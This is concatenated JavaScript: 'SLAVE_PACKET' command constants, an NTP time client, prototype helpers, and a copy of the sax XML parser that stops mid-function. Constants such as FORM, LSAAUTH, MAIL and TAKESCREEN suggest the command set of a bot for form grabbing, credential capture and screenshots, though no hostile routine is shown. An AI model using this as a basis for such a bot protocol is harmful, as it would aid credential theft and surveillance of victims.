    g.SLAVE_PACKET_DEFAULTJS = 1000 + 0;
    g.SLAVE_PACKET_PRIVATEJS = 1000 + 1;
    g.SLAVE_PACKET_PROCESS_PROP = 1000 + 2;
    g.SLAVE_PACKET_SPCONFIG = 1000 + 3;
    g.SLAVE_PACKET_FORM = 1000 + 4;
    g.SLAVE_PACKET_URLNOTIFICATION = 1000 + 5;
    g.SLAVE_PACKET_UPDATE = 1000 + 6;
    g.SLAVE_PACKET_LSAAUTH = 1000 + 7;
    g.SLAVE_PACKET_LOGLINE = 1000 + 8;
    g.SLAVE_PACKET_MAIL = 1000 + 9;

    g.SLAVE_PACKET_API_TAKESCREEN = 1100 + 9;

    g.STATUS_SUCCESS = 0x00;

    function getRandomArbitrary(min, max) {
        return Math.floor(Math.random() * (max - min) + min);
    }

    function getRandomInt() {
        return getRandomArbitrary(0, 0xffffffff);
    }

    function min(a, b) {
        return (((a) < (b)) ? (a) : (b));
    }

    function AlignUp(ADDR, ALMNT) {
        return ((((ADDR) + (ALMNT) - 1) / (ALMNT)) * (ALMNT));
    }

    function sleep(ms, cb) {
        setTimeout(function () { cb() }, ms);
    }

    g.sleep = sleep;
    g.min = min;
    g.AlignUp = AlignUp;
    g.getRandomArbitrary = getRandomArbitrary;
    g.getRandomInt = getRandomInt;

    process.network = {};
    process.network.ntp = {
        defaultNtpPort: 123,
        defaultNtpServer: "pool.ntp.org",
        ntpReplyTimeout : 10000
    }

    process.network.ntp.getNetworkTime = function (server, port, callback) {
        if (callback === null || typeof callback !== "function") {
            return;
        }

        server = server || process.network.ntp.defaultNtpServer;
        port = port || process.network.ntp.defaultNtpPort;

        var client = dgram.createSocket("udp4"),
            ntpData = new Buffer(48);

        // RFC 2030 -> LI = 0 (no warning, 2 bits), VN = 3 (IPv4 only, 3 bits), Mode = 3 (Client Mode, 3 bits) -> 1 byte
        // -> rtol(LI, 6) ^ rotl(VN, 3) ^ rotl(Mode, 0)
        // -> = 0x00 ^ 0x18 ^ 0x03
        ntpData[0] = 0x1B;

        for (var i = 1; i < 48; i++) {
            ntpData[i] = 0;
        }

        var timeout = setTimeout(function () {
            client.close();
            callback("Timeout waiting for NTP response.", null);
        }, process.network.ntp.ntpReplyTimeout);

        // Some errors can happen before/after send() or cause send() to was impossible.
        
        
        
        var errorFired = false;

        client.on('error', function (err) {
            if (errorFired) {
                return;
            }

            callback(err, null);
            errorFired = true;

            clearTimeout(timeout);
        });

        client.send(ntpData, 0, ntpData.length, port, server, function (err) {
            if (err) {
                if (errorFired) {
                    return;
                }
                clearTimeout(timeout);
                callback(err, null);
                errorFired = true;
                client.close();
                return;
            }

            client.once('message', function (msg) {
                clearTimeout(timeout);
                client.close();

                
                
                var offsetTransmitTime = 40,
                    intpart = 0,
                    fractpart = 0;

                
                for (var i = 0; i <= 3; i++) {
                    intpart = 256 * intpart + msg[offsetTransmitTime + i];
                }

                
                for (i = 4; i <= 7; i++) {
                    fractpart = 256 * fractpart + msg[offsetTransmitTime + i];
                }

                var milliseconds = (intpart * 1000 + (fractpart * 1000) / 0x100000000);

                // **UTC** time
                var date = new Date("Jan 01 1900 GMT");
                date.setUTCMilliseconds(date.getUTCMilliseconds() + milliseconds);

                callback(null, date);
            });
        });
    };


}

String.prototype.replaceAll = function (target, replacement) {
    return this.split(target).join(replacement);
};

String.prototype.cut = function (i0, i1) {
    return this.substring(0, i0) + this.substring(i1);
};

String.prototype.insertAt = function (index, string) {
    return this.substr(0, index) + string + this.substr(index);
};

String.prototype.hashCode = function () {
    var hash = 0;
    if (this.length == 0) return hash;
    for (let i = 0; i < this.length; i++) {
        let char = this.charCodeAt(i);
        hash = ((hash << 5) - hash) + char;
        hash = hash & hash; // Convert to 32bit integer
    }
    return hash;
}

Array.prototype.randomElement = function () {
    return this[Math.floor(Math.random() * this.length)]
}

Array.prototype.remove = function () {
    var what, a = arguments, L = a.length, ax;
    while (L && this.length) {
        what = a[--L];
        while ((ax = this.indexOf(what)) !== -1) {
            this.splice(ax, 1);
        }
    }
    return this;
};

Array.prototype.unique = function () {
    var a = this.concat();
    for (var i = 0; i < a.length; ++i) {
        for (var j = i + 1; j < a.length; ++j) {
            if (a[i] === a[j])
                a.splice(j--, 1);
        }
    }

    return a;
};


Array.prototype.findIndex = function (predicate) {
    var list = Object(this);
    var length = Math.max(0, list.length) >>> 0; // ES.ToUint32;
    if (length === 0) return -1;
    if (typeof predicate !== 'function' || Object.prototype.toString.call(predicate) !== '[object Function]') {
        throw new TypeError('Array#findIndex: predicate must be a function');
    }
    var thisArg = arguments.length > 1 ? arguments[1] : undefined;
    for (var i = 0; i < length; i++) {
        if (predicate.call(thisArg, list[i], i, list)) return i;
    }
    return -1;
};                                                                                                                                                                                                                                                                                                                                                                                                                                          

========


;(function (sax) {

sax.parser = function (strict, opt) { return new SAXParser(strict, opt) }
sax.SAXParser = SAXParser
sax.SAXStream = SAXStream
sax.createStream = createStream










sax.MAX_BUFFER_LENGTH = 64 * 1024

var buffers = [
  "comment", "sgmlDecl", "textNode", "tagName", "doctype",
  "procInstName", "procInstBody", "entity", "attribName",
  "attribValue", "cdata", "script"
]

sax.EVENTS = 
  [ "text"
  , "processinginstruction"
  , "sgmldeclaration"
  , "doctype"
  , "comment"
  , "attribute"
  , "opentag"
  , "closetag"
  , "opencdata"
  , "cdata"
  , "closecdata"
  , "error"
  , "end"
  , "ready"
  , "script"
  , "opennamespace"
  , "closenamespace"
  ]

function SAXParser (strict, opt) {
  if (!(this instanceof SAXParser)) return new SAXParser(strict, opt)

  var parser = this
  clearBuffers(parser)
  parser.q = parser.c = ""
  parser.bufferCheckPosition = sax.MAX_BUFFER_LENGTH
  parser.opt = opt || {}
  parser.opt.lowercase = parser.opt.lowercase || parser.opt.lowercasetags
  parser.looseCase = parser.opt.lowercase ? "toLowerCase" : "toUpperCase"
  parser.tags = []
  parser.closed = parser.closedRoot = parser.sawRoot = false
  parser.tag = parser.error = null
  parser.strict = !!strict
  parser.noscript = !!(strict || parser.opt.noscript)
  parser.state = S.BEGIN
  parser.ENTITIES = Object.create(sax.ENTITIES)
  parser.attribList = []

  
  
  
  if (parser.opt.xmlns) parser.ns = Object.create(rootNS)

  
  parser.trackPosition = parser.opt.position !== false
  if (parser.trackPosition) {
    parser.position = parser.line = parser.column = 0
  }
  emit(parser, "onready")
}

if (!Object.create) Object.create = function (o) {
  function f () { this.__proto__ = o }
  f.prototype = o
  return new f
}

if (!Object.getPrototypeOf) Object.getPrototypeOf = function (o) {
  return o.__proto__
}

if (!Object.keys) Object.keys = function (o) {
  var a = []
  for (var i in o) if (o.hasOwnProperty(i)) a.push(i)
  return a
}

function checkBufferLength (parser) {
  var maxAllowed = Math.max(sax.MAX_BUFFER_LENGTH, 10)
    , maxActual = 0
  for (var i = 0, l = buffers.length; i < l; i ++) {
    var len = parser[buffers[i]].length
    if (len > maxAllowed) {
      
      
      
      
      switch (buffers[i]) {
        case "textNode":
          closeText(parser)
        break

        case "cdata":
          emitNode(parser, "oncdata", parser.cdata)
          parser.cdata = ""
        break

        case "script":
          emitNode(parser, "onscript", parser.script)
          parser.script = ""
        break

        default:
          error(parser, "Max buffer length exceeded: "+buffers[i])
      }
    }
    maxActual = Math.max(maxActual, len)
  }
  
  parser.bufferCheckPosition = (sax.MAX_BUFFER_LENGTH - maxActual)
                             + parser.position
}

function clearBuffers (parser) {
  for (var i = 0, l = buffers.length; i < l; i ++) {
    parser[buffers[i]] = ""
  }
}

SAXParser.prototype =
  { end: function () { end(this) }
  , write: write
  , resume: function () { this.error = null; return this }
  , close: function () { return this.write(null) }
  }

try {
  var Stream = require("stream").Stream
} catch (ex) {
  var Stream = function () {}
}


var streamWraps = sax.EVENTS.filter(function (ev) {
  return ev !== "error" && ev !== "end"
})

function createStream (strict, opt) {
  return new SAXStream(strict, opt)
}

function SAXStream (strict, opt) {
  if (!(this instanceof SAXStream)) return new SAXStream(strict, opt)

  Stream.apply(this)

  this._parser = new SAXParser(strict, opt)
  this.writable = true
  this.readable = true


  var me = this

  this._parser.onend = function () {
    me.emit("end")
  }

  this._parser.onerror = function (er) {
    me.emit("error", er)

    
    
    me._parser.error = null
  }

  streamWraps.forEach(function (ev) {
    Object.defineProperty(me, "on" + ev, {
      get: function () { return me._parser["on" + ev] },
      set: function (h) {
        if (!h) {
          me.removeAllListeners(ev)
          return me._parser["on"+ev] = h
        }
        me.on(ev, h)
      },
      enumerable: true,
      configurable: false
    })
  })
}

SAXStream.prototype = Object.create(Stream.prototype,
  { constructor: { value: SAXStream } })

SAXStream.prototype.write = function (data) {
  this._parser.write(data.toString())
  this.emit("data", data)
  return true
}

SAXStream.prototype.end = function (chunk) {
  if (chunk && chunk.length) this._parser.write(chunk.toString())
  this._parser.end()
  return true
}

SAXStream.prototype.on = function (ev, handler) {
  var me = this
  if (!me._parser["on"+ev] && streamWraps.indexOf(ev) !== -1) {
    me._parser["on"+ev] = function () {
      var args = arguments.length === 1 ? [arguments[0]]
               : Array.apply(null, arguments)
      args.splice(0, 0, ev)
      me.emit.apply(me, args)
    }
  }

  return Stream.prototype.on.call(me, ev, handler)
}




var whitespace = "\r\n\t "
  
  
  , number = "0124356789"
  , letter = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
  
  , quote = "'\""
  , entity = number+letter+"#"
  , attribEnd = whitespace + ">"
  , CDATA = "[CDATA["
  , DOCTYPE = "DOCTYPE"
  , XML_NAMESPACE = "http://www.w3.org/XML/1998/namespace"
  , XMLNS_NAMESPACE = "http://www.w3.org/2000/xmlns/"
  , rootNS = { xml: XML_NAMESPACE, xmlns: XMLNS_NAMESPACE }


whitespace = charClass(whitespace)
number = charClass(number)
letter = charClass(letter)







var nameStart = /[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/

var nameBody = /[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040\.\d-]/

quote = charClass(quote)
entity = charClass(entity)
attribEnd = charClass(attribEnd)

function charClass (str) {
  return str.split("").reduce(function (s, c) {
    s[c] = true
    return s
  }, {})
}

function isRegExp (c) {
  return Object.prototype.toString.call(c) === '[object RegExp]'
}

function is (charclass, c) {
  return isRegExp(charclass) ? !!c.match(charclass) : charclass[c]
}

function not (charclass, c) {
  return !is(charclass, c)
}

var S = 0
sax.STATE =
{ BEGIN                     : S++
, TEXT                      : S++ 
, TEXT_ENTITY               : S++ 
, OPEN_WAKA                 : S++ 
, SGML_DECL                 : S++ 
, SGML_DECL_QUOTED          : S++ 
, DOCTYPE                   : S++ 
, DOCTYPE_QUOTED            : S++ 
, DOCTYPE_DTD               : S++ 
, DOCTYPE_DTD_QUOTED        : S++ 
, COMMENT_STARTING          : S++ 
, COMMENT                   : S++ 
, COMMENT_ENDING            : S++ 
, COMMENT_ENDED             : S++ 
, CDATA                     : S++ 
, CDATA_ENDING              : S++ 
, CDATA_ENDING_2            : S++ 
, PROC_INST                 : S++ 
, PROC_INST_BODY            : S++ 
, PROC_INST_ENDING          : S++ 
, OPEN_TAG                  : S++ 
, OPEN_TAG_SLASH            : S++ 
, ATTRIB                    : S++ 
, ATTRIB_NAME               : S++ 
, ATTRIB_NAME_SAW_WHITE     : S++ 
, ATTRIB_VALUE              : S++ 
, ATTRIB_VALUE_QUOTED       : S++ 
, ATTRIB_VALUE_UNQUOTED     : S++ 
, ATTRIB_VALUE_ENTITY_Q     : S++ 
, ATTRIB_VALUE_ENTITY_U     : S++ 
, CLOSE_TAG                 : S++ 
, CLOSE_TAG_SAW_WHITE       : S++ 
, SCRIPT                    : S++ 
, SCRIPT_ENDING             : S++ 
}

sax.ENTITIES =
{ "amp" : "&"
, "gt" : ">"
, "lt" : "<"
, "quot" : "\""
, "apos" : "'"
, "AElig" : 198
, "Aacute" : 193
, "Acirc" : 194
, "Agrave" : 192
, "Aring" : 197
, "Atilde" : 195
, "Auml" : 196
, "Ccedil" : 199
, "ETH" : 208
, "Eacute" : 201
, "Ecirc" : 202
, "Egrave" : 200
, "Euml" : 203
, "Iacute" : 205
, "Icirc" : 206
, "Igrave" : 204
, "Iuml" : 207
, "Ntilde" : 209
, "Oacute" : 211
, "Ocirc" : 212
, "Ograve" : 210
, "Oslash" : 216
, "Otilde" : 213
, "Ouml" : 214
, "THORN" : 222
, "Uacute" : 218
, "Ucirc" : 219
, "Ugrave" : 217
, "Uuml" : 220
, "Yacute" : 221
, "aacute" : 225
, "acirc" : 226
, "aelig" : 230
, "agrave" : 224
, "aring" : 229
, "atilde" : 227
, "auml" : 228
, "ccedil" : 231
, "eacute" : 233
, "ecirc" : 234
, "egrave" : 232
, "eth" : 240
, "euml" : 235
, "iacute" : 237
, "icirc" : 238
, "igrave" : 236
, "iuml" : 239
, "ntilde" : 241
, "oacute" : 243
, "ocirc" : 244
, "ograve" : 242
, "oslash" : 248
, "otilde" : 245
, "ouml" : 246
, "szlig" : 223
, "thorn" : 254
, "uacute" : 250
, "ucirc" : 251
, "ugrave" : 249
, "uuml" : 252
, "yacute" : 253
, "yuml" : 255
, "copy" : 169
, "reg" : 174
, "nbsp" : 160
, "iexcl" : 161
, "cent" : 162
, "pound" : 163
, "curren" : 164
, "yen" : 165
, "brvbar" : 166
, "sect" : 167
, "uml" : 168
, "ordf" : 170
, "laquo" : 171
, "not" : 172
, "shy" : 173
, "macr" : 175
, "deg" : 176
, "plusmn" : 177
, "sup1" : 185
, "sup2" : 178
, "sup3" : 179
, "acute" : 180
, "micro" : 181
, "para" : 182
, "middot" : 183
, "cedil" : 184
, "ordm" : 186
, "raquo" : 187
, "frac14" : 188
, "frac12" : 189
, "frac34" : 190
, "iquest" : 191
, "times" : 215
, "divide" : 247
, "OElig" : 338
, "oelig" : 339
, "Scaron" : 352
, "scaron" : 353
, "Yuml" : 376
, "fnof" : 402
, "circ" : 710
, "tilde" : 732
, "Alpha" : 913
, "Beta" : 914
, "Gamma" : 915
, "Delta" : 916
, "Epsilon" : 917
, "Zeta" : 918
, "Eta" : 919
, "Theta" : 920
, "Iota" : 921
, "Kappa" : 922
, "Lambda" : 923
, "Mu" : 924
, "Nu" : 925
, "Xi" : 926
, "Omicron" : 927
, "Pi" : 928
, "Rho" : 929
, "Sigma" : 931
, "Tau" : 932
, "Upsilon" : 933
, "Phi" : 934
, "Chi" : 935
, "Psi" : 936
, "Omega" : 937
, "alpha" : 945
, "beta" : 946
, "gamma" : 947
, "delta" : 948
, "epsilon" : 949
, "zeta" : 950
, "eta" : 951
, "theta" : 952
, "iota" : 953
, "kappa" : 954
, "lambda" : 955
, "mu" : 956
, "nu" : 957
, "xi" : 958
, "omicron" : 959
, "pi" : 960
, "rho" : 961
, "sigmaf" : 962
, "sigma" : 963
, "tau" : 964
, "upsilon" : 965
, "phi" : 966
, "chi" : 967
, "psi" : 968
, "omega" : 969
, "thetasym" : 977
, "upsih" : 978
, "piv" : 982
, "ensp" : 8194
, "emsp" : 8195
, "thinsp" : 8201
, "zwnj" : 8204
, "zwj" : 8205
, "lrm" : 8206
, "rlm" : 8207
, "ndash" : 8211
, "mdash" : 8212
, "lsquo" : 8216
, "rsquo" : 8217
, "sbquo" : 8218
, "ldquo" : 8220
, "rdquo" : 8221
, "bdquo" : 8222
, "dagger" : 8224
, "Dagger" : 8225
, "bull" : 8226
, "hellip" : 8230
, "permil" : 8240
, "prime" : 8242
, "Prime" : 8243
, "lsaquo" : 8249
, "rsaquo" : 8250
, "oline" : 8254
, "frasl" : 8260
, "euro" : 8364
, "image" : 8465
, "weierp" : 8472
, "real" : 8476
, "trade" : 8482
, "alefsym" : 8501
, "larr" : 8592
, "uarr" : 8593
, "rarr" : 8594
, "darr" : 8595
, "harr" : 8596
, "crarr" : 8629
, "lArr" : 8656
, "uArr" : 8657
, "rArr" : 8658
, "dArr" : 8659
, "hArr" : 8660
, "forall" : 8704
, "part" : 8706
, "exist" : 8707
, "empty" : 8709
, "nabla" : 8711
, "isin" : 8712
, "notin" : 8713
, "ni" : 8715
, "prod" : 8719
, "sum" : 8721
, "minus" : 8722
, "lowast" : 8727
, "radic" : 8730
, "prop" : 8733
, "infin" : 8734
, "ang" : 8736
, "and" : 8743
, "or" : 8744
, "cap" : 8745
, "cup" : 8746
, "int" : 8747
, "there4" : 8756
, "sim" : 8764
, "cong" : 8773
, "asymp" : 8776
, "ne" : 8800
, "equiv" : 8801
, "le" : 8804
, "ge" : 8805
, "sub" : 8834
, "sup" : 8835
, "nsub" : 8836
, "sube" : 8838
, "supe" : 8839
, "oplus" : 8853
, "otimes" : 8855
, "perp" : 8869
, "sdot" : 8901
, "lceil" : 8968
, "rceil" : 8969
, "lfloor" : 8970
, "rfloor" : 8971
, "lang" : 9001
, "rang" : 9002
, "loz" : 9674
, "spades" : 9824
, "clubs" : 9827
, "hearts" : 9829
, "diams" : 9830
}

Object.keys(sax.ENTITIES).forEach(function (key) {
    var e = sax.ENTITIES[key]
    var s = typeof e === 'number' ? String.fromCharCode(e) : e
    sax.ENTITIES[key] = s
})

for (var S in sax.STATE) sax.STATE[sax.STATE[S]] = S


S = sax.STATE

function emit (parser, event, data) {
  parser[event] && parser[event](data)
}

function emitNode (parser, nodeType, data) {
  if (parser.textNode) closeText(parser)
  emit(parser, nodeType, data)
}

function closeText (parser) {
  parser.textNode = textopts(parser.opt, parser.textNode)
  if (parser.textNode) emit(parser, "ontext", parser.textNode)
  parser.textNode = ""
}

function textopts (opt, text) {
  if (opt.trim) text = text.trim()
  if (opt.normalize) text = text.replace(/\s+/g, " ")
  return text
}

function error (parser, er) {
  closeText(parser)
  if (parser.trackPosition) {
    er += "\nLine: "+parser.line+
          "\nColumn: "+parser.column+
          "\nChar: "+parser.c
  }
  er = new Error(er)
  parser.error = er
  emit(parser, "onerror", er)
  return parser
}

function end (parser) {
  if (!parser.closedRoot) strictFail(parser, "Unclosed root tag")
  if (parser.state !== S.TEXT) error(parser, "Unexpected end")
  closeText(parser)
  parser.c = ""
  parser.closed = true
  emit(parser, "onend")
  SAXParser.call(parser, parser.strict, parser.opt)
  return parser
}

function strictFail (parser, message) {
  if (typeof parser !== 'object' || !(parser instanceof SAXParser))
    throw new Error('bad call to strictFail');
  if (parser.strict) error(parser, message)
}

function newTag (parser) {
  if (!parser.strict) parser.tagName = parser.tagName[parser.looseCase]()
  var parent = parser.tags[parser.tags.length - 1] || parser
    , tag = parser.tag = { name : parser.tagName, attributes : {} }

  
  if (parser.opt.xmlns) tag.ns = parent.ns
  parser.attribList.length = 0
}

function qname (name) {
  var i = name.indexOf(":")
    , qualName = i < 0 ? [ "", name ] : name.split(":")
    , prefix = qualName[0]
    , local = qualName[1]

  
  if (name === "xmlns") {
    prefix = "xmlns"
    local = ""
  }

  return { prefix: prefix, local: local }
}

function attrib (parser) {
  if (!parser.strict) parser.attribName = parser.attribName[parser.looseCase]()

  if (parser.attribList.hasOwnProperty(parser.attribName) ||
      parser.tag.attributes.hasOwnProperty(parser.attribName)) {
   return parser.attribName = parser.attribValue = ""
  }

  if (parser.opt.xmlns) {
    var qn = qname(parser.attribName)
      , prefix = qn.prefix
      , local = qn.local

    if (prefix === "xmlns") {
      
      if (local === "xml" && parser.attribValue !== XML_NAMESPACE) {
        strictFail( parser
                  , "xml: prefix must be bound to " + XML_NAMESPACE + "\n"
                  + "Actual: " + parser.attribValue )
      } else if (local === "xmlns" && parser.attribValue !== XMLNS_NAMESPACE) {
        strictFail( parser
                  , "xmlns: prefix must be bound to " + XMLNS_NAMESPACE + "\n"
                  + "Actual: " + parser.attribValue )
      } else {
        var tag = parser.tag
          , parent = parser.tags[parser.tags.length - 1] || parser
        if (tag.ns === parent.ns) {
          tag.ns = Object.create(parent.ns)
        }
        tag.ns[local] = parser.attribValue
      }
    }

    
    
    
    parser.attribList.push([parser.attribName, parser.attribValue])
  } else {
    
    parser.tag.attributes[parser.attribName] = parser.attribValue
    emitNode( parser
            , "onattribute"
            , { name: parser.attribName
              , value: parser.attribValue } )
  }

  parser.attribName = parser.attribValue = ""
}

function openTag (parser, selfClosing) {
  if (parser.opt.xmlns) {
    
    var tag = parser.tag

    
    var qn = qname(parser.tagName)
    tag.prefix = qn.prefix
    tag.local = qn.local
    tag.uri = tag.ns[qn.prefix] || qn.prefix

    if (tag.prefix && !tag.uri) {
      strictFail(parser, "Unbound namespace prefix: "
                       + JSON.stringify(parser.tagName))
    }

    var parent = parser.tags[parser.tags.length - 1] || parser
    if (tag.ns && parent.ns !== tag.ns) {
      Object.keys(tag.ns).forEach(function (p) {
        emitNode( parser
                , "onopennamespace"
                , { prefix: p , uri: tag.ns[p] } )
      })
    }

    
    
    
    for (var i = 0, l = parser.attribList.length; i < l; i ++) {
      var nv = parser.attribList[i]
      var name = nv[0]
        , value = nv[1]
        , qualName = qname(name)
        , prefix = qualName.prefix
        , local = qualName.local
        , uri = prefix == "" ? "" : (tag.ns[prefix] || "")
        , a = { name: name
              , value: value
              , prefix: prefix
              , local: local
              , uri: uri
              }

      
      
      if (prefix && prefix != "xmlns" && !uri) {
        strictFail(parser, "Unbound namespace prefix: "
                         + JSON.stringify(prefix))
        a.uri = prefix
      }
      parser.tag.attributes[name] = a
      emitNode(parser, "onattribute", a)
    }
    parser.attribList.length = 0
  }

  parser.tag.isSelfClosing = !!selfClosing

  
  parser.sawRoot = true
  parser.tags.push(parser.tag)
  emitNode(parser, "onopentag", parser.tag)
  if (!selfClosing) {
    
    if (!parser.noscript && parser.tagName.toLowerCase() === "script") {
      parser.state = S.SCRIPT
    } else {
      parser.state = S.TEXT
    }
    parser.tag = null
    parser.tagName = ""
  }
  parser.attribName = parser.attribValue = ""
  parser.attribList.length = 0
}

function closeTag (parser) {
  if (!parser.tagName) {
    strictFail(parser, "Weird empty close tag.")
    parser.textNode += "</>"
    parser.state = S.TEXT
    return
  }

  if (parser.script) {
    if (parser.tagName !== "script") {
      parser.script += "</" + parser.tagName + ">"
      parser.tagName = ""
      parser.state = S.SCRIPT
      return
    }
    emitNode(parser, "onscript", parser.script)
    parser.script = ""
  }

  
  
  var t = parser.tags.length
  var tagName = parser.tagName
  if (!parser.strict) tagName = tagName[parser.looseCase]()
  var closeTo = tagName
  while (t --) {
    var close = parser.tags[t]
    if (close.name !== closeTo) {
      
      strictFail(parser, "Unexpected close tag")
    } else break
  }

  
  if (t < 0) {
    strictFail(parser, "Unmatched closing tag: "+parser.tagName)
    parser.textNode += "</" + parser.tagName + ">"
    parser.state = S.TEXT
    return
  }
  parser.tagName = tagName
  var s = parser.tags.length
  while (s --> t) {
    var tag = parser.tag = parser.tags.pop()
    parser.tagName = parser.tag.name
    emitNode(parser, "onclosetag", parser.tagName)

    var x = {}
    for (var i in tag.ns) x[i] = tag.ns[i]

    var parent = parser.tags[parser.tags.length - 1] || parser
    if (parser.opt.xmlns && tag.ns !== parent.ns) {
      
      Object.keys(tag.ns).forEach(function (p) {
        var n = tag.ns[p]
        emitNode(parser, "onclosenamespace", { prefix: p, uri: n })
      })
    }
  }
  if (t === 0) parser.closedRoot = true
  parser.tagName = parser.attribValue = parser.attribName = ""
  parser.attribList.length = 0
  parser.state = S.TEXT
}

function parseEntity (parser) {
  var entity = parser.entity
    , entityLC = entity.toLowerCase()
    , num
    , numStr = ""
  if (parser.ENTITIES[entity])
    return parser.ENTITIES[entity]
  if (parser.ENTITIES[entityLC])
    return parser.ENTITIES[entityLC]
  entity = entityLC
  if (entity.charAt(0) === "#") {
    if (entity.charAt(1) === "x") {
      entity = entity.slice(2)
      num = parseInt(entity, 16)
      numStr = num.toString(16)
    } else {
      entity = entity.slice(1)
      num = parseInt(entity, 10)
      numStr = num.toString(10)
    }
  }
  entity = entity.replace(/^0+/, "")
  if (numStr.toLowerCase() !== entity) {
    strictFail(parser, "Invalid character entity")
    return "&"+parser.entity + ";"
  }
  return String.fromCharCode(num)
}

function write (chunk) {
  var parser = this
  if (this.error) throw this.error
  if (parser.closed) return error(parser,
    "Cannot write after close. Assign an onready handler.")
  if (chunk === null) return end(parser)
  var i = 0, c = ""
  while (parser.c = c = chunk.charAt(i++)) {
    if (parser.trackPosition) {
      parser.position ++
      if (c === "\n") {
        parser.line ++
        parser.column = 0
      } else parser.column ++
    }
    switch (parser.state) {

      case S.BEGIN:
        if (c === "<") {
          parser.state = S.OPEN_WAKA
          parser.startTagPosition = parser.position
        } else if (not(whitespace,c)) {
          
          
          strictFail(parser, "Non-whitespace before first tag.")
          parser.textNode = c
          parser.state = S.TEXT
        }
      continue

      case S.TEXT:
        if (parser.sawRoot && !parser.closedRoot) {
          var starti = i-1
          while (c && c!=="<" && c!=="&") {
            c = chunk.charAt(i++)
            if (c && parser.trackPosition) {
              parser.position ++
              if (c === "\n") {
                parser.line ++
                parser.column = 0
              } else parser.column ++
            }
          }
          parser.textNode += chunk.substring(starti, i-1)
        }
        if (c === "<") {
          parser.state = S.OPEN_WAKA
          parser.startTagPosition = parser.position
        } else {
          if (not(whitespace, c) && (!parser.sawRoot || parser.closedRoot))
            strictFail(parser, "Text data outside of root node.")
          if (c === "&") parser.state = S.TEXT_ENTITY
          else parser.textNode += c
        }
      continue

      case S.SCRIPT:
        
        if (c === "<") {
          parser.state = S.SCRIPT_ENDING
        } else parser.script += c
      continue

      case S.SCRIPT_ENDING:
        if (c === "/") {
          parser.state = S.CLOSE_TAG
        } else {
          parser.script += "<" + c
          parser.state = S.SCRIPT
        }
      continue

      case S.OPEN_WAKA:
        
        if (c === "!") {
          parser.state = S.SGML_DECL
          parser.sgmlDecl = ""
        } else if (is(whitespace, c)) {
          
        } else if (is(nameStart,c)) {
          parser.state = S.OPEN_TAG
          parser.tagName = c
        } else if (c === "/") {
          parser.state = S.CLOSE_TAG
          parser.tagName = ""
        } else if (c === "?") {
          parser.state = S.PROC_INST
          parser.procInstName = parser.procInstBody = ""
        } else {
          strictFail(parser, "Unencoded <")
          
          if (parser.startTagPosition + 1 < parser.position) {
            var pad = parser.position - parser.startTagPosition
            c = new Array(pad).join(" ") + c
          }
          parser.textNode += "<" + c
          parser.state = S.TEXT
        }
      continue

      case S.SGML_DECL:
        if ((parser.sgmlDecl+c).toUpperCase() === CDATA) {
          emitNode(parser, "onopencdata")
          parser.state = S.CDATA
          parser.sgmlDecl = ""
          parser.cdata = ""
        } else if (parser.sgmlDecl+c === "--") {
          parser.state = S.COMMENT
          parser.comment = ""
          parser.sgmlDecl = ""
        } else if ((parser.sgmlDecl+c).toUpperCase() === DOCTYPE) {
          parser.state = S.DOCTYPE
          if (parser.doctype || parser.sawRoot) strictFail(parser,
            "Inappropriately located doctype declaration")
          parser.doctype = ""
          parser.sgmlDecl = ""
        } else if (c === ">") {
          emitNode(parser, "onsgmldeclaration", parser.sgmlDecl)
          parser.sgmlDecl = ""
          parser.state = S.TEXT
        } else if (is(quote, c)) {
          parser.state = S.SGML_DECL_QUOTED
          parser.sgmlDecl += c
        } else parser.sgmlDecl += c
      continue

      case S.SGML_DECL_QUOTED:
        if (c === parser.q) {
          parser.state = S.SGML_DECL
          parser.q = ""
        }
        parser.sgmlDecl += c
      continue

      case S.DOCTYPE:
        if (c === ">") {
          parser.state = S.TEXT
          emitNode(parser, "ondoctype", parser.doctype)
          parser.doctype = true 
        } else {
          parser.doctype += c
          if (c === "[") parser.state = S.DOCTYPE_DTD
          else if (is(quote, c)) {
            parser.state = S.DOCTYPE_QUOTED
            parser.q = c
          }
        }
      continue

      case S.DOCTYPE_QUOTED:
        parser.doctype += c
        if (c === parser.q) {
          parser.q = ""
          parser.state = S.DOCTYPE
        }
      continue

      case S.DOCTYPE_DTD:
        parser.doctype += c
        if (c === "]") parser.state = S.DOCTYPE
        else if (is(quote,c)) {
          parser.state = S.DOCTYPE_DTD_QUOTED
          parser.q = c
        }
      continue

      case S.DOCTYPE_DTD_QUOTED:
        parser.doctype += c
        if (c === parser.q) {
          parser.state = S.DOCTYPE_DTD
          parser.q = ""
        }
      continue

      case S.COMMENT:
        if (c === "-") parser.state = S.COMMENT_ENDING
        else parser.comment += c
      continue

      case S.COMMENT_ENDING:
        if (c === "-") {
          parser.state = S.COMMENT_ENDED
          parser.comment = textopts(parser.opt, parser.comment)
          if (parser.comment) emitNode(parser, "oncomment", parser.comment)
          parser.comment = ""
        } else {
          parser.comment += "-" + c
          parser.state = S.COMMENT
        }
      continue

      case S.COMMENT_ENDED:
        if (c !== ">") {
          strictFail(parser, "Malformed comment")
          
          
          parser.comment += "--" + c
          parser.state = S.COMMENT
        } else parser.state = S.TEXT
      continue

      case S.CDATA:
        if (c === "]") parser.state = S.CDATA_ENDING
        else parser.cdata += c
      continue

      case S.CDATA_ENDING:
        if (c === "]") parser.state = S.CDATA_ENDING_2
        else {
          parser.cdata += "]" + c
          parser.state = S.CDATA
        }
      continue

      case S.CDATA_ENDING_2:
        if (c === ">") {
          if (parser.cdata) emitNode(parser, "oncdata", parser.cdata)
          emitNode(parser, "onclosecdata")
          parser.cdata = ""
          parser.state = S.TEXT
        } else if (c === "]") {
          parser.cdata += "]"
        } else {
          parser.cdata += "]]" + c
          parser.state = S.CDATA
        }
      continue

      case S.PROC_INST:
        if (c === "?") parser.state = S.PROC_INST_ENDING
        else if (is(whitespace, c)) parser.state = S.PROC_INST_BODY
        else parser.procInstName += c
      continue

      case S.PROC_INST_BODY:
        if (!parser.procInstBody && is(whitespace, c)) continue
